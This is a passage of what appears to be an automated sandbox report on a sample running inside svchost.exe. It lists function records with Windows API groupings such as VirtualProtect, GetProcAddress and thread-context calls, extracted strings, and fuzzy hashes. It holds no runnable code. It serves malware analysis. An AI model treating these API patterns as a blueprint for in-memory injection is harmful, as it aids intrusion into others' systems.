                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000014E41FDC7DE,?,?,?,?,?,?,?,?,0000014E41FDCF9D,?,?,00000001), ref: 0000014E41FDD0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value
                                                                                                                            • String ID: 1%$Y%
                                                                                                                            • API String ID: 3702945584-1395475152
                                                                                                                            • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction ID: a9bf51a53c9a1f80fc76c82896e2421d109dbda82caf93dda9c71af6b8fc7838
                                                                                                                            • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                                                            • Instruction Fuzzy Hash: D0111C7070468441FE68A735995D7F9E3C6BF847F0F1C4325A82BC6AFADE68C5039620
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 190073905-0
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: a28f0207ded7251b2138ce8eaabf7731b6e17eb6dd1893435d04d01492ed5137
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: D781F271704B418AFF50AB6598493F9E3D0BF85788F5C46169A0ACB7B6EB78C8078730
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                            • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction ID: 03ee9c64fc4e5180bd68ea4e23d85fb7920b7978f1ef5f904570876798f634f1
                                                                                                                            • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                            • Instruction Fuzzy Hash: 80317231316A40A1EF169B82A4087E9A3D4BF48BA0F5D46259D1F87BA5DF39C5468330
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                            • String ID: CONOUT$
                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction ID: 58d35a48e73ae5a6a2069cbe50502fe36390fdbaf60b5645c7a944c23e30e8f6
                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                            • Instruction Fuzzy Hash: 86116031318B8486EB608F52E858359B7E0FB88FE4F094225EA5EC77A4DF7CC5168750
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                            • String ID: wr
                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction ID: 8310219fc58ae82eb0bcc7bfba685b767ad38c6a0f57641c290d7d667e99c083
                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                            • Instruction Fuzzy Hash: 80115B76708B4582EF549B21E5082A9B7F1FB88B95F490029DF8E877A4EF3DC506C724
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1666949209-0
                                                                                                                            • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction ID: 07ea2566a821138ba5b41bcd2566ad333a6cc9f6e2a32e52345a153ce6aaa6b8
                                                                                                                            • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                                                            • Instruction Fuzzy Hash: 61D18D76209B8881DE709B16E4943AAB7F0F788B84F144216EACE87B75DF7CC552CB50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                            • String ID: dialer
                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction ID: 64828584eb3bfdbaceddc1153c386e701d38d80c8c2db94475a50a70e660af8b
                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                            • Instruction Fuzzy Hash: 48317832705B5582FF15CF56A9487AAA7E0BF44B94F0C85249E4A87B65EB38C4A38360
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\system32\svchost.exe
                                                                                                                            • API String ID: 3168794593-4180442734
                                                                                                                            • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction ID: 1ea6c2aa508163f35958e79cb2a9901d7fd2f010a3072b3d942776ec3241fee8
                                                                                                                            • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                                                                            • Instruction Fuzzy Hash: D021917B60CBD88AEB52DF2598592DDABE1FB49F64F0E4016DB45C3363DA2DC4068720
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: 4c605ab0eebe7c8a65e16142fd15fb062952cf9a22b794a22443e09c107b39ea
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: 9511063030528042FE64A735955D7F9A3D2BF847F0F1C4729A92BC6AFAEE69C4039620
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: 45260b5053477a1902ed5b314b8ddb3b202787d03d162f4498fe3015baeaf19a
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: 0B012931308B4486EB64DB52A85C799A3E5FB88FD4F894035DE4A83765DF3CC98AC760
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: 27845c9942124fe15b1c72357d23f614dfff2e05e98621f38ac1f8b99baeb5ad
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 44011B75315B4482FF259B61E81C3A9A7F1BF45B96F090429CA4E87774EF3DC10A8720
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: a1bf88d4b9d8004459b5fa9669b2167566428502909aa59e78964a9a5b042688
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 8951D63270160186EF14DF75E44CBB9B7D6FB45B98F598128DA1B83BA8DB75C842C720
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: 6bc827c4c3bb3e0c98ca9239eca2c50e04eb8a87f0c80140b29f13db2d6fb965
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 2631D43230074096EF14DF61E84C7A9B7E5FB44B98F098118EE5B83BA9DB39C942C724
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: b12ca8b25fa5122955bb982c68454bcc7e018bb98c49cc1ed73afc7e3ae07854
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: 30F0493270874591EF608B51F888799A7E0FB48B98F884120DA4986A64DF3CC64FC710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: 035e3789f53f373a927057afabb0f361c24ef996c6f03b6afc748e9683801fc8
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: 9FF06271319B0881EF148F24E44C3A9A3A0FF89775F590319CA6A853F4CF2CC1468760
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: cc80a717613b9aef5249e127a8ce4b2df5163e301108ee4070d8aa47fa087152
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: A7F05E70308B8482EF108B12B90C1A9A3A1BF48FE4F0D4120EE4A87B28DE2CC4468720
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction ID: 742035003ab41573749cbaf50ab97c77026f2c65be4dc385caaa5c533d93989b
                                                                                                                            • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                                                            • Instruction Fuzzy Hash: 7402B432219B8486EB60CB59E4943AAB7F0F7C5794F144116EA8E87BB8DF7CD485CB10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction ID: 4debb5f53ed61f6123289aa0e5a7e5e44eede09a84607efc51eced9d514b7eed
                                                                                                                            • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                                                            • Instruction Fuzzy Hash: B561A736619A84C6EB60CB15E44836AB7F0F788784F140216EA8E87BB8DB7CD456CB10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: ead154b9435ffe6a454870689a50e6f6704023e04e4d2936ba47f9ea0b1d783b
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 0711A0B2BD0E1351FEA41569E75E3E993C07FD8374F4C8628A966862F7CA28C8474230
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: e72965eb51f99d8a0ac95fcd431345854843bb65debfdf1bdb0de3510e35bf29
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 6E118F32B58B5011FF665568D45D3E593C17FA83A8E0F062CA976C67F68A2CC9438224
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: 9afa7e71d04fa23ee4952312235bac51a1d74b63e64a95d112a04740b73905c4
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: 45614C7670064042FE659B65E58C3EEEBE1BF867C0F5D4515DA0A9BFB4EA3CD8438220
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 0789a3831c1f6d771d65473aec04d891a6e65c0c978cd43e319f5209d2f070c5
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: F7614833705B848AEB209F65D4443EDB7E0FB84B98F084215EE4A57BA8DB38D596C714
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 9fc2ac829e4d419cfb4e4e7491d5e77e61521fb2b31f7c138b84e684f10f9101
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: E0516E32200380CAEF648B659548398B7E0FB55BD4F1C4116DA9DC7FA5CB7ED466CB20
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 321aa2bf97eac6cafb4f774fd1c13e020d27b9bfb404d6bee772e39a7e361af9
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 54516E722003808AEF648F26D5883A9B7E0FB94B95F1C4255DA9E87BE5CB38D453C718
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: 0bce45575947cd2407113779943a525e14445a621b98b0471fe801dac2351894
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: C951B4327412008EDF54CB15D40CB98B7E5FB94BE9F9C8124DE8683B6CE7B8D8428724
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: c159a0ba046949333dfa247496e2d25aa9719a0157f25d5229989bbc026eab31
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: A2319E313416409AEB14DF11E848799B7E4FB44BD9F9D8018EE9B83BA8DB7CD942C724
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: afeff5cfcaf4403b8b152d041e9c12e6ce2064c04c3d4c674498ddf2345b7502
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: 44D1D072718B8089EB11CFA9D4443ECBBF1FB54798F194216CE5A97BAAEA34C507C350
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: cea13cf84bf215eda1d4e32a4ca8aa5317b936fd82c1a643056d64915862160e
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: 2091B372708B5485FF60DFA994883EDABE0BB44B98F1D4109DE0A977A5EB74C483C720
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd
                                                                                                                            Similarity
